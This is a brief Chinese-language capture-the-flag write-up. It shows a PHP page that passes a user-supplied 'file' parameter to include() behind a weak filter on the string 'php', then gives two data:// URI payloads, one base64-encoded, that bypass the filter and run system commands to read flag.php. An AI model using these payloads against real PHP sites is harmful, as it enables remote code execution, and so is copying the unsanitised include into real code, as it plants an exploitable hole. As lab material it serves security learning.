if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
过滤了php,如果用上题的php://file怎么都解不开,可以使用data
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
或?file=data://text/plain,<?php system('tac flag.php');?>
但是下面一种在这题无用